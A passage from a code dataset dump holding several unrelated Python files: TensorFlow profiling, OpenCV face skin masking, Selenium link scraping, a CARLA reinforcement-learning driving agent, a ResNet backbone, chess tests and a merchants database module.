data_sets.train.next_batch(\n TRAINING_FLAGS.batch_size, fake_data=False)\n feed_dict = {\n images_placeholder: images_feed,\n labels_placeholder: labels_feed,\n }\n # 每 TRAINING_FLAGS.stats_per_steps 步,搜集一下统计数据:\n if step % TRAINING_FLAGS.stats_per_steps == 0:\n _, loss_value = sess.run(fetches=[\n train_op, loss], feed_dict=feed_dict, options=run_options, run_metadata=run_metadata)\n\n # 将本步搜集的统计数据添加到tfprofiler实例中\n mnist_profiler.add_step(step=step, run_meta=run_metadata)\n else:\n _, loss_value = sess.run(fetches=[train_op, loss],\n feed_dict=feed_dict)\n\n'''\ngrpah view显示每个graph node运行时间,并输出到timeline\n'''\n# 统计内容为每个graph node的运行时间和占用内存\nprofile_graph_opts_builder = option_builder.ProfileOptionBuilder(\n option_builder.ProfileOptionBuilder.time_and_memory())\n\n# 输出方式为timeline\nprofile_graph_opts_builder.with_timeline_output(\n timeline_file='/tmp/mnist_profiler.json')\n# 定义显示sess.Run() 第70步的统计数据\nprofile_graph_opts_builder.with_step(70)\n\n# 显示视图为graph view\nmnist_profiler.profile_graph(profile_graph_opts_builder.build())\n\n'''\nscope view显示模型中的参数数量分布\n'''\n# 统计内容为所有trainable Variable Op\nprofile_scope_opt_builder = option_builder.ProfileOptionBuilder(\n option_builder.ProfileOptionBuilder.trainable_variables_parameter())\n\n# 显示的嵌套深度为4\nprofile_scope_opt_builder.with_max_depth(4)\n# 显示字段是params,即参数\nprofile_scope_opt_builder.select(['params'])\n# 根据params数量进行显示结果排序\nprofile_scope_opt_builder.order_by('params')\n\n# 显示视图为scope view\nmnist_profiler.profile_name_scope(profile_scope_opt_builder.build())\n\n'''\nop view显示模型中的expensive node \n'''\nprofile_op_opt_builder = option_builder.ProfileOptionBuilder()\n\n# 显示字段:op执行时间,使用该op的node的数量。 注意:op的执行时间即所有使用该op的node的执行时间总和。\nprofile_op_opt_builder.select(['micros', 'occurrence'])\n# 根据op执行时间进行显示结果排序\nprofile_op_opt_builder.order_by('micros')\n# 过滤条件:只显示排名top 5\nprofile_op_opt_builder.with_max_depth(4)\n\n# 显示视图为op view\nmnist_profiler.profile_operations(profile_op_opt_builder.build())\n\n'''\ncode view – 显示python代码的执行资源消耗 \n'''\nprofile_code_opt_builder = option_builder.ProfileOptionBuilder()\n\n# 过滤条件:显示minist.py代码。\nprofile_code_opt_builder.with_max_depth(1000)\nprofile_code_opt_builder.with_node_names(show_name_regexes=['mnist.py.*'])\n\n# 过滤条件:只显示执行时间大于10us的代码\nprofile_code_opt_builder.with_min_execution_time(min_micros=10)\n\n# 显示字段:执行时间,且结果按照时间排序\nprofile_code_opt_builder.select(['micros'])\nprofile_code_opt_builder.order_by('micros')\n\n# 显示视图为code view\nmnist_profiler.profile_python(profile_code_opt_builder.build())\n","sub_path":"profiler.py","file_name":"profiler.py","file_ext":"py","file_size_in_byte":5502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"9306204","text":"import imutils\nimport numpy as np\nimport cv2\nimport dlib\n\nimage = cv2.imread(r'D:\\DEAP\\DEAP_dataset\\s01_trial01\\frame0.jpg')\nprint('image shape:',image.shape)\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\ndetector = dlib.get_frontal_face_detector() # face detector\npredictor = dlib.shape_predictor('D:\\DEAP\\DEAP_dataset\\shape_predictor_68_face_landmarks.dat') #face detector\nfaces = detector(gray,1)\nh = 100\nfor face in faces:\n landmarks = predictor(gray, face)\n x1 = landmarks.part(20).x\n y1 = landmarks.part(20).y\n x2 = landmarks.part(25).x\n y2 = landmarks.part(25).y\n\n cv2.rectangle(image, (x1, y1-h), (x2, y2), (0, 255, 0), 2)\n\nprint(x1, y1-h, x2, y2)\ncv2.imshow(\"rectangle\", image)\n\nslicedImage = image[y1-h:y2, x1:x2]\n#print(slicedImage)\n#cv2.waitKey(0)\n\ncv2.imshow(\"sliced image\", slicedImage)\n\n\n##### SKIN SELECTION PROCESS -> SKIN MASK INSIDE THE ROI #####\nlower = np.array([0, 48, 80], dtype = \"uint8\") #upper and lower boundaries of skin\nupper = np.array([20, 255, 255], dtype = \"uint8\") #of the HSV pixel intensities to be condidered skin\nslicedImage = imutils.resize(slicedImage, width = 400)\nconverted = cv2.cvtColor(slicedImage, cv2.COLOR_BGR2HSV) #converting RGB to HSV\nskinMask = cv2.inRange(converted, lower, upper) #upper and lower boundaries fo the HSV pixel intensities\n\nkernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (11, 11))\nskinMask = cv2.erode(skinMask, kernel, iterations = 2)\nskinMask = cv2.dilate(skinMask, kernel, iterations = 2)\n# blur the mask to help remove noise, then apply the mask to the frame\nskinMask = cv2.GaussianBlur(skinMask, (3, 3), 0)\nskin = cv2.bitwise_and(slicedImage, slicedImage, mask = skinMask)\n# show the skin in the image along with the mask\n# cv2.imshow(\"images\", np.hstack([slicedImage, skin]))\ncv2.imshow(\"final sliced image\", skin)\n\n# print('sliced image:',slicedImage)\n# print('\\nskin selected pixels:',skin)\n# print('\\nAverage of the skin pixels:',np.mean(skin))\n\n### converting to BGR as openCV will read it as RGB\nskin_BGR = cv2.cvtColor(skin, cv2.COLOR_HSV2BGR)\nprint('skin_BGR:',np.mean(skin_BGR[:,:,0]))\n# Rn = skin_BGR[:,:,0]/np.mean(skin_BGR[:,:,0])\n# Gn = skin_BGR[:,:,1]/np.mean(skin_BGR[:,:,1])\n# Bn = skin_BGR[:,:,2]/np.mean(skin_BGR[:,:,2])\n# print('Rn:',Rn)\n# print('Gn:',Gn)\n# print('Bn:',Bn)\n# Xs = (3*Rn) - (2*Gn)\n# Ys = (1.5*Rn) + Gn - (1.5*Bn)\n\n\ncv2.waitKey(0)\n\n\n","sub_path":"code_for_ROI.py","file_name":"code_for_ROI.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"297131098","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.common.keys import Keys\r\n\r\ndriver=webdriver.Firefox(executable_path=\"C:\\Drivers\\geckodriver-v0.27.0-win64\\geckodriver.exe\")\r\n\r\ndriver.get(\"https://phptravels.com/demo/\") #opening the website\r\n\r\nlinks=driver.find_elements(By.TAG_NAME, \"a\") #capture all the links and storing them in a variable\r\n\r\nprint(\"Number of links present in the webpage are: \",len(links)) #print how many links present in a page\r\n\r\n#extracting each and every link from links list and printing them\r\n#for loop will read each link and print the same out\r\n\r\nfor link in links:\r\n print(link.text)\r\n\r\n#Clicking on the link, either by using the link_text method or partial link_text method\r\n\r\n#driver.find_element(By.LINK_TEXT,\"Pricing\").click()\r\ndriver.find_element_by_partial_link_text(\"Pri\").click()\r\n\r\ndriver.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"links.py","file_name":"links.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"111113711","text":"import glob\r\nimport os\r\nimport sys\r\nimport cv2\r\nimport numpy as np\r\nimport torch\r\nimport random\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nimport math\r\nfrom tensorboardX import SummaryWriter\r\n\r\nfrom librerys.cnn import CNN\r\nfrom librerys.decay_schedule import LinearDecaySchedule\r\nfrom librerys.experience_memory import ExperienceMemory, Experience\r\n\r\ntry:\r\n sys.path.append(glob.glob('../carla/dist/carla-*%d.%d-%s.egg' % (\r\n sys.version_info.major,\r\n sys.version_info.minor,\r\n 'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])\r\nexcept IndexError:\r\n pass\r\nimport carla\r\n#Contador global de ejecuciones\r\nglobal_step_num = 0\r\n\r\n# Habilitar entrenamiento por gráfica o CPU\r\nuse_cuda = True\r\ndevice = torch.device(\"cuda:\"+str(args.gpu_id) if torch.cuda.is_available() and use_cuda else \"cpu\")\r\n\r\n# Habilitar la semilla aleatoria para poder reproducir el experimento a posteriori\r\nseed = 2020\r\ntorch.manual_seed(seed)\r\nnp.random.seed(seed)\r\nif torch.cuda.is_available() and use_cuda:\r\n torch.cuda.manual_seed_all(seed)\r\n\r\n\r\nwriter = SummaryWriter()\r\n\r\nSTEPS_PER_EPISODE = 300\r\nSHOW_PREVIEW = False\r\nSECONDS_PER_EPISODE=20\r\n#MAX_NUM_EPISODES = 100\r\nMAX_NUM_EPISODES = 200\r\nclip_reward=True\r\nuse_target_network=True\r\nload_trained_model=True\r\nlista_ecu=[]\r\nlista_error=[]\r\nclass CarEnv:\r\n SHOW_CAM = SHOW_PREVIEW\r\n STEER_AMT = 1.0\r\n\r\n actor_list = []\r\n\r\n front_camera = None\r\n collision_hist = []\r\n\r\n def __init__(self):\r\n im_width = 84\r\n im_height = 84\r\n self.im_width = im_width\r\n self.im_height = im_height\r\n self.client = carla.Client('localhost', 2000)\r\n self.client.set_timeout(2.0) \r\n self.world = self.client.get_world()\r\n blueprint_library = self.world.get_blueprint_library()\r\n self.model_3 = blueprint_library.filter('model3')[0]\r\n \r\n def reset(self):\r\n self.collision_hist = []\r\n self.actor_list = []\r\n\r\n self.transform = random.choice(self.world.get_map().get_spawn_points())\r\n self.vehicle = self.world.spawn_actor(self.model_3, self.transform)\r\n self.actor_list.append(self.vehicle)\r\n\r\n self.rgb_cam = self.world.get_blueprint_library().find('sensor.camera.rgb')\r\n\r\n self.rgb_cam.set_attribute('image_size_x', f'{self.im_width}')\r\n self.rgb_cam.set_attribute('image_size_y', f'{self.im_height}')\r\n self.rgb_cam.set_attribute('fov', '110')\r\n\r\n\r\n transform = carla.Transform(carla.Location(x=5, z=2))\r\n\r\n self.sensor = self.world.spawn_actor(self.rgb_cam, transform, attach_to=self.vehicle)\r\n\r\n self.actor_list.append(self.sensor)\r\n self.sensor.listen(lambda data: self.process_img(data))\r\n\r\n colsensor = self.world.get_blueprint_library().find('sensor.other.collision')\r\n self.colsensor = self.world.spawn_actor(colsensor, transform, attach_to=self.vehicle)\r\n self.actor_list.append(self.colsensor)\r\n self.colsensor.listen(lambda event: self.collision_data(event))\r\n\r\n while self.front_camera is None:\r\n time.sleep(0.01)\r\n\r\n self.episode_start = time.time()\r\n self.vehicle.apply_control(carla.VehicleControl(throttle=0.0, brake=0.0)) \r\n\r\n return self.front_camera \r\n \r\n def collision_data(self, event):\r\n self.collision_hist.append(event)\r\n \r\n\r\n def process_img(self, image):\r\n i2 = np.array(image.raw_data)\r\n i2 = i2.reshape((self.im_height, self.im_width, 4))\r\n i3 = i2[:, :, :3]\r\n if self.SHOW_CAM:\r\n cv2.imshow(\"\", i3)\r\n cv2.waitKey(1)\r\n i3 = i3.mean(2)\r\n i3 = i3.astype(np.float32)\r\n i3 *= 1.0/255.0\r\n i3 = np.reshape(i3, [1,84,84])\r\n i3 = i3[np.newaxis, ...]\r\n self.front_camera = i3\r\n def obs_shape(self):\r\n obs = self.front_camera.shape\r\n return obs\r\n def action_space(self):\r\n action_space_name = [\"throttle center\",\"throttle left\",\"throttle right\",\"brake\"]\r\n return action_space_name\r\n \r\n def step(self, action):\r\n if action == 3:\r\n self.vehicle.apply_control(carla.VehicleControl(brake=1.0))\r\n fre = 0\r\n\r\n if action == 2:\r\n self.vehicle.apply_control(carla.VehicleControl(throttle=1.0, steer=0, brake=0.0))\r\n fre = 1\r\n \r\n if action == 1:\r\n self.vehicle.apply_control(carla.VehicleControl(throttle=1.0, steer=-1*self.STEER_AMT, brake=0.0))\r\n fre = 0\r\n \r\n if action == 0:\r\n self.vehicle.apply_control(carla.VehicleControl(throttle=1.0, steer=1*self.STEER_AMT, brake=0.0))\r\n fre = 0\r\n \r\n v = self.vehicle.get_velocity()\r\n kmh = int(3.6 * math.sqrt(v.x**2 + v.y**2 + v.z**2))\r\n if len(self.collision_hist) != 0:\r\n done = True\r\n reward = -2000\r\n elif kmh < 20:\r\n done = False\r\n reward = -10\r\n if kmh > 50:\r\n kmh = 50\r\n elif fre == 1:\r\n done = False\r\n reward = 500\r\n else:\r\n done = False\r\n reward = 500\r\n if self.episode_start + SECONDS_PER_EPISODE < time.time():\r\n reward = 2000\r\n done = True\r\n\r\n return self.front_camera, reward, done, None\r\n\r\nclass DQNAgent(object):\r\n def __init__(self, obs_shape, action_shape):\r\n self.gamma=0.75\r\n self.learning_rate=0.9\r\n self.best_mean_reward = -float(\"inf\")\r\n self.best_reward = -float(\"inf\")\r\n self.training_steps_completed = 0\r\n self.action_shape=action_shape\r\n\r\n self.DQN=CNN\r\n\r\n self.Q = self.DQN(obs_shape, action_shape, device).to(device)\r\n self.Q_optimizer = torch.optim.Adam(self.Q.parameters(), lr = self.learning_rate)\r\n\r\n if use_target_network:\r\n self.Q_target = self.DQN(obs_shape, action_shape, device).to(device)\r\n\r\n self.policy = self.epsilon_greedy_Q\r\n self.epsilon_max = 1.0\r\n self.epsilon_min = 0.005\r\n self.epsilon_decay = LinearDecaySchedule(initial_value = self.epsilon_max,\r\n final_value = self.epsilon_min, \r\n max_steps = 0.5 * MAX_NUM_EPISODES * STEPS_PER_EPISODE)\r\n self.step_num = 0\r\n\r\n self.memory = ExperienceMemory(capacity = int(1000000))\r\n\r\n def get_action(self, obs):\r\n return self.policy(obs)\r\n\r\n def epsilon_greedy_Q(self, obs):\r\n self.step_num += 1\r\n if random.random() < self.epsilon_decay(self.step_num):\r\n print(self.epsilon_decay(self.step_num))\r\n action = random.choice([a for a in range(self.action_shape)])\r\n else:\r\n action = np.argmax(self.Q(obs).data.to(torch.device('cpu')).numpy())\r\n print(\"se activo la red neuronal\")\r\n return action\r\n\r\n def learn(self, obs, action, reward, next_obs, done):\r\n if done:\r\n td_target = reward + 0.0\r\n else:\r\n td_target = reward + self.gamma * torch.max(self.Q(next_obs))\r\n\r\n a=self.Q(obs)\r\n td_error = a[:,action]-td_target\r\n self.Q_optimizer.zero_grad()\r\n td_error.backward()\r\n writer.add_scalar(\"DQL/TD_error\", td_error.mean(), self.step_num)\r\n self.Q_optimizer.step()\r\n\r\n def replay_experience(self, batch_size = None):\r\n batch_size = batch_size if batch_size is not None else 32\r\n experience_batch = self.memory.sample(batch_size)\r\n self.learn_from_batch_experience(experience_batch)\r\n self.training_steps_completed += 1\r\n\r\n def learn_from_batch_experience(self, experiences):\r\n batch_xp = Experience(*zip(*experiences))\r\n obs_batch = np.array(batch_xp.obs)/255.0\r\n action_batch = np.array(batch_xp.action)\r\n reward_batch = np.array(batch_xp.reward)\r\n \r\n\r\n if clip_reward == True:\r\n reward_batch = np.sign(reward_batch)\r\n next_obs_batch = np.array(batch_xp.next_obs)/255.0\r\n done_batch = np.array(batch_xp.done)\r\n\r\n for i in range(31):\r\n if use_target_network == True:\r\n if self.step_num % 2000 == 0:\r\n self.Q_target.load_state_dict(self.Q.state_dict())\r\n td_target = reward_batch + ~done_batch * \\\r\n np.tile(self.gamma, len(next_obs_batch)) #* \\\r\n td_target = td_target[i]*self.Q_target(next_obs_batch[i]).max(1)[0].data.cpu().numpy()\r\n lista_ecu.append(td_target)\r\n\r\n else:\r\n td_target = reward_batch + ~done_batch * \\\r\n np.tile(self.gamma, len(next_obs_batch)) #* \\\r\n td_target = td_target[i]*self.Q_target(next_obs_batch[i]).max(1)[0].data.cpu().numpy()\r\n lista_ecu.append(td_target)\r\n \r\n td_target = torch.Tensor(lista_ecu)\r\n td_target = td_target.to(device)\r\n action_idx = torch.from_numpy(action_batch).to(device)\r\n \r\n for j in range(31):\r\n td_error = self.Q(obs_batch[j]).gather(1, action_idx[j].view(-1,1))-(td_target[j].float().unsqueeze(1))\r\n td_error.mean().backward()\r\n self.Q_optimizer.zero_grad()\r\n self.Q_optimizer.step()\r\n\r\n def save(self, env_name):\r\n file_name = \"trained_models/\"+\"DQL_\"+env_name+\".pt\"\r\n agent_state = {\"Q\": self.Q.state_dict(),\r\n \"best_mean_reward\": self.best_mean_reward,\r\n \"best_reward\": self.best_reward}\r\n torch.save(agent_state, file_name)\r\n print(\"Estado del agente guardado en : \", file_name)\r\n \r\n \r\n def load(self, env_name):\r\n file_name = \"trained_models/\"+\"DQL_\"+env_name+\".pt\"\r\n agent_state = torch.load(file_name, map_location = lambda storage, loc: storage)\r\n self.Q.load_state_dict(agent_state[\"Q\"])\r\n self.Q.to(device)\r\n self.best_mean_reward = agent_state[\"best_mean_reward\"]\r\n self.best_reward = agent_state[\"best_reward\"]\r\n print(\"Cargado del modelo Q desde\", file_name,\r\n \"que hasta el momento tiene una mejor recompensa media de: \",self.best_mean_reward,\r\n \" y una recompensa máxima de: \", self.best_reward)\r\n \r\nif __name__=='__main__':\r\n env_name = \"AgentTrain\"\r\n env = CarEnv()\r\n obs = env.reset()\r\n act = env.action_space()\r\n obs_shape = env.obs_shape()\r\n action_shape = len(act)\r\n agent = DQNAgent(obs_shape,action_shape)\r\n episode_rewards = list() \r\n \r\n previous_checkpoint_mean_ep_rew = agent.best_mean_reward\r\n num_improved_episodes_before_checkpoint = 0\r\n \r\n if load_trained_model:\r\n try:\r\n agent.load(env_name)\r\n previous_checkpoint_mean_ep_rew = agent.best_mean_reward\r\n except FileNotFoundError:\r\n print(\"ERROR: no existe ningún modelo entrenado para este entorno. Empezamos desde cero\")\r\n\r\n episode = 0\r\n \r\n while global_step_num < MAX_NUM_EPISODES:\r\n obs = env.reset()\r\n total_reward = 0.0\r\n done = False\r\n step = 0\r\n env.collision_hist = []\r\n while not done:\r\n action = agent.get_action(obs)\r\n next_obs, reward, done, info = env.step(action)\r\n agent.learn(obs, action, reward, next_obs, done)\r\n agent.memory.store(Experience(obs, action, reward, next_obs, done))\r\n\r\n obs = next_obs\r\n total_reward += reward\r\n step += 1\r\n \r\n \r\n if done is True:\r\n \r\n episode += 1\r\n episode_rewards.append(total_reward)\r\n global_step_num += 1\r\n\r\n if total_reward > agent.best_reward:\r\n agent.best_reward = total_reward\r\n for actor in env.actor_list:\r\n actor.destroy()\r\n if np.mean(episode_rewards) > previous_checkpoint_mean_ep_rew: \r\n num_improved_episodes_before_checkpoint += 1\r\n\r\n if num_improved_episodes_before_checkpoint >= 100:\r\n previous_checkpoint_mean_ep_rew = np.mean(episode_rewards)\r\n agent.best_mean_reward = np.mean(episode_rewards)\r\n agent.save(env_name)\r\n num_improved_episodes_before_checkpoint = 0\r\n\r\n print(\"\\n Episodio #{} finalizado con {} iteraciones. recompensa = {}, recompensa media = {:.2f}, mejor recompensa = {}\".\r\n format(episode, step+1, total_reward, np.mean(episode_rewards), agent.best_reward))\r\n\r\n writer.add_scalar(\"main/ep_reward\", total_reward, global_step_num)\r\n writer.add_scalar(\"main/mean_ep_reward\", np.mean(episode_rewards), global_step_num)\r\n writer.add_scalar(\"main/max_ep_reward\", agent.best_reward, global_step_num)\r\n\r\n if agent.memory.get_size() >= 5*100000:\r\n agent.replay_experience()\r\n\r\n #break\r\n","sub_path":"Env_Car.py","file_name":"Env_Car.py","file_ext":"py","file_size_in_byte":13092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"440210855","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom model.utils.config import cfg\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport math\nimport torch.utils.model_zoo as model_zoo\nimport pdb\nimport torchvision.models as models\n\n\nclass ResNetBackBone(nn.Module):\n def __init__(self, num_layers=101, pretrained=False):\n self.model_path = 'data/pretrained_model/resnet101_caffe.pth'\n self.dout_rpn = 1024\n self.dout_fts = 2048\n self.pretrained = pretrained\n\n super(ResNetBackbone, self).__init__()\n\n def init_modules(self):\n resnet = models.resnet101()\n\n if self.pretrained == True:\n print(\"Loading pretrained weights from %s\" %(self.model_path))\n state_dict = torch.load(self.model_path)\n resnet.load_state_dict({k:v for k,v in state_dict.items() if k in resnet.state_dict()})\n\n # Build resnet.\n self.RCNN_base = nn.Sequential(resnet.conv1, resnet.bn1,resnet.relu,\n resnet.maxpool,resnet.layer1,resnet.layer2,resnet.layer3)\n\n self.RCNN_top = nn.Sequential(resnet.layer4)\n\n # Fix blocks\n for p in self.RCNN_base[0].parameters(): p.requires_grad=False\n for p in self.RCNN_base[1].parameters(): p.requires_grad=False\n\n assert (0 <= cfg.RESNET.FIXED_BLOCKS < 4)\n if cfg.RESNET.FIXED_BLOCKS >= 3:\n for p in self.RCNN_base[6].parameters(): p.requires_grad=False\n if cfg.RESNET.FIXED_BLOCKS >= 2:\n for p in self.RCNN_base[5].parameters(): p.requires_grad=False\n if cfg.RESNET.FIXED_BLOCKS >= 1:\n for p in self.RCNN_base[4].parameters(): p.requires_grad=False\n\n def set_bn_fix(m):\n classname = m.__class__.__name__\n if classname.find('BatchNorm') != -1:\n for p in m.parameters(): p.requires_grad=False\n\n self.RCNN_base.apply(set_bn_fix)\n self.RCNN_top.apply(set_bn_fix)\n\n def train(self, mode=True):\n # Override train so that the training mode is set as we want\n nn.Module.train(self, mode)\n if mode:\n # Set fixed blocks to be in eval mode\n self.RCNN_base.eval()\n self.RCNN_base[5].train()\n self.RCNN_base[6].train()\n\n def set_bn_eval(m):\n classname = m.__class__.__name__\n if classname.find('BatchNorm') != -1:\n m.eval()\n\n self.RCNN_base.apply(set_bn_eval)\n self.RCNN_top.apply(set_bn_eval)\n\n def head_to_tail(self, pool5):\n fc7 = self.RCNN_top(pool5).mean(3).mean(2)\n return fc7\n","sub_path":"lib/model/faster_rcnn/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"19625503","text":"import board as b\nimport pieces as p\nimport time\nimport boardOperator as o\nfrom alphaBetaAgent import AlphaBetaAgent\nfrom randomAgent import RandomAgent\nfrom humanAgent import HumanAgent\nimport multiprocessing as mp\n\ndef test1():\n \"\"\"\n board = b.Board()\n board.nukeBoard()\n board.board[1][1] = p.Rook('white')\n board.board[1][1].rank = 1\n board.board[1][1].column = 1\n board.printBoard()\n print(board.getWhiteMoves())\n board.board[1][4] = p.Pawn('white')\n board.board[1][4].rank = 1\n board.board[1][4].column = 4\n board.board[3][1] = p.Pawn('black')\n board.board[3][1].rank = 3\n board.board[3][1].column = 1\n board.printBoard()\n print(board.getWhiteMoves())\n \"\"\"\n pass\n\ndef test2():\n \"\"\"\n game = o.Operator()\n whitePlayer = RandomAgent('white')\n blackPlayer = RandomAgent('black')\n\n count = 0\n\n moves = 0\n\n start = time.time()\n\n while True:\n count += 1\n\n if count % 20 == 0:\n game.mainBoard = b.Board()\n\n #moves += len(game.getBoard().getWhiteMoves())\n\n move = whitePlayer.getMove(game.getBoard())\n result = game.makeMove(move)\n blackPlayer.sendMove(move)\n if result != 0:\n break\n\n #moves += len(game.getBoard().getBlackMoves())\n\n move = blackPlayer.getMove(game.getBoard())\n result = game.makeMove(move)\n whitePlayer.sendMove(move)\n if result != 0:\n break\n\n if time.time() - start > 10:\n break\n\n game.getBoard().printBoard()\n print(count, 'moves')\n #print(moves/(count*2), 'average moves')\n print(time.time() - start)\n \"\"\"\n pass\n\ndef test3(i):\n start = time.time()\n for y in range(50):\n board = b.Board()\n whitePlayer = RandomAgent('white')\n blackPlayer = RandomAgent('black')\n for x in range(20):\n move = whitePlayer.getMove(board.clone())\n if move == 'help':\n break\n board.move(move)\n move = blackPlayer.getMove(board.clone())\n if move == 'help':\n break\n board.move(move)\n\n print(i, time.time()-start)\n\ndef test4(cores, sprints):\n start = time.time()\n pool = mp.Pool(cores)\n rounds = list(range(sprints))\n pool.map(test3, rounds)\n print(\"done,\", time.time()-start)\n\ndef test5():\n start = time.time()\n board = b.Board()\n whitePlayer = RandomAgent('white')\n blackPlayer = RandomAgent('black')\n for x in range(20):\n move = whitePlayer.getMove(board.clone())\n if move == 'help':\n break\n board.move(move)\n move = blackPlayer.getMove(board.clone())\n if move == 'help':\n break\n board.move(move)\n print(time.time()-start)\n board.printBoard()\n return board\n\ndef test6():\n start = time.time()\n board = b.Board()\n whitePlayer = RandomAgent('white')\n blackPlayer = RandomAgent('black')\n while True:\n move = whitePlayer.getMove(board.clone())\n if move == 'help':\n break\n board.move(move)\n move = blackPlayer.getMove(board.clone())\n if move == 'help':\n break\n board.move(move)\n if len(board.getWhiteMoves()) < 10:\n break\n print(time.time()-start)\n board.printBoard()\n return board\n\ndef test7(moves):\n start = time.time()\n board = b.Board()\n whitePlayer = RandomAgent('white')\n blackPlayer = RandomAgent('black')\n for x in range(moves):\n move = whitePlayer.getMove(board.clone())\n if move == 'help':\n break\n board.move(move)\n move = blackPlayer.getMove(board.clone())\n if move == 'help':\n break\n board.move(move)\n print(time.time()-start)\n board.printBoard()\n return board\n\ndef test8(colour):\n if colour == 'white':\n whitePlayer = HumanAgent('white')\n blackPlayer = RandomAgent('black')\n else:\n whitePlayer = RandomAgent('white')\n blackPlayer = HumanAgent('black')\n\n game = o.Operator(whitePlayer, blackPlayer)\n\n game.run()\n\ndef test9():\n whitePlayer = HumanAgent('white')\n blackPlayer = HumanAgent('black')\n\n game = o.Operator(whitePlayer, blackPlayer)\n\n result = game.run()\n\ndef test10():\n whitePlayer = RandomAgent('white')\n blackPlayer = RandomAgent('black')\n\n game = o.Operator(whitePlayer, blackPlayer)\n\n result = game.run(['verbose'])\n\ndef test11(x):\n whitePlayer = RandomAgent('white')\n blackPlayer = RandomAgent('black')\n board = b.Board()\n start = time.time()\n count = 0\n while time.time() - start < 10:\n count += 1\n\n if count % 20 == 0:\n board = b.Board()\n\n move = whitePlayer.getMove(board.clone())\n if move == 'help':\n board = b.Board()\n continue\n board.move(move)\n\n move = blackPlayer.getMove(board.clone())\n if move == 'help':\n board = b.Board()\n continue\n board.move(move)\n print(x, \":\", count, 'moves')\n\ndef test12(cores, sprints):\n pool = mp.Pool(cores)\n rounds = list(range(sprints))\n pool.map(test11, rounds)\n\ndef test13():\n whitePlayer = RandomAgent('white')\n blackPlayer = RandomAgent('black')\n\n game = o.Operator(whitePlayer, blackPlayer)\n\n while True:\n result = game.run()\n if result != 4:\n break\n\ndef test14():\n whitePlayer = RandomAgent('white')\n blackPlayer = RandomAgent('black')\n board = b.Board()\n count = 0\n while True:\n count += 1\n\n if count % 20 == 0:\n return board\n\n move = whitePlayer.getMove(board.clone())\n if move == 'help':\n return board\n board.move(move)\n\n move = blackPlayer.getMove(board.clone())\n if move == 'help':\n return board\n board.move(move)\n\ndef test15():\n whitePlayer = RandomAgent('white')\n blackPlayer = RandomAgent('black')\n board = b.Board()\n count = 0\n while True:\n count += 1\n\n if count % 20 == 0:\n break\n\n move = whitePlayer.getMove(board.clone())\n if move == 'help':\n return\n board.move(move)\n\n move = blackPlayer.getMove(board.clone())\n if move == 'help':\n return\n board.move(move)\n\n start = time.time()\n count = 0\n while time.time() - start < 10:\n count += 1\n if count % 2 == 0:\n x = board.getMoves('white')\n y = board.getMoves('black')\n else:\n y = board.getMoves('white')\n x = board.getMoves('black')\n board.printBoard()\n print(x, y)\n print(len(x), len(y))\n print(count)\n\ndef test16(args):\n whitePlayer = RandomAgent('white')\n blackPlayer = RandomAgent('black')\n\n game = o.Operator(whitePlayer, blackPlayer)\n\n result = game.run(args)\n\ndef test17(id, endTime):\n whitePlayer = RandomAgent('white')\n blackPlayer = RandomAgent('black')\n board = b.Board()\n start = time.time()\n count = 0\n while time.time() - start < endTime:\n count += 1\n\n if count % 20 == 0:\n board = b.Board()\n\n move = whitePlayer.getMove(board.clone())\n if move == 'help':\n board = b.Board()\n continue\n board.move(move)\n\n move = blackPlayer.getMove(board.clone())\n if move == 'help':\n board = b.Board()\n continue\n board.move(move)\n print(\"ID:\", id, \"Run Time:\", endTime, \"Move Count:\", count)\n return count\n\ndef test18(cores, sprints, clock):\n start = time.time()\n pool = mp.Pool(cores)\n result = []\n for i in range(sprints):\n pool.apply_async(test17, args=(i, clock), callback=result.append)\n pool.close()\n pool.join()\n end = time.time()\n total = 2*sum(result)\n average = total/(end-start)\n print(\"Total Moves:\", total)\n print(\"Total Time:\", end-start)\n print(\"Average:\", average)\n return average\n\ndef test19(cores):\n average = []\n average.append(test18(cores, 480, 1))\n average.append(test18(cores, 240, 2))\n average.append(test18(cores, 160, 3))\n average.append(test18(cores, 120, 4))\n average.append(test18(cores, 80, 6))\n average.append(test18(cores, 40, 12))\n average.append(test18(cores, 24, 20))\n average.append(test18(cores, 16, 30))\n print(\"Overall Average:\", sum(average) / 8)\n\nif __name__ == \"__main__\":\n test8('white')\n","sub_path":"PythonServer/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":8470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"338257715","text":"from db.run_sql import run_sql\nfrom models.merchant import Merchant\n\ndef save(merchant):\n sql = \"INSERT INTO merchants( name, active ) VALUES ( %s, %s ) RETURNING id\"\n values = [merchant.name, merchant.active]\n results = run_sql( sql, values )\n merchant.id = results[0]['id']\n return merchant\n\n\ndef select_all():\n merchants = []\n\n sql = \"SELECT * FROM merchants\"\n results = run_sql(sql)\n\n for row in results:\n merchant = Merchant(row['name'], row['active'], row['id'])\n merchants.append(merchant)\n return merchants\n\n\ndef select(id):\n merchant = None\n sql = \"SELECT * FROM merchants WHERE id = %s\"\n values = [id]\n result = run_sql(sql, values)[0]\n\n if result is not None:\n merchant = Merchant(result['name'], result['active'], result['id'] )\n return merchant\n\n\ndef delete_all():\n sql = \"DELETE FROM merchants\"\n run_sql(sql)\n\ndef delete(id):\n sql = \"DELETE FROM merchants WHERE id = %s\"\n values = [id]\n run_sql(sql, values)\n\ndef 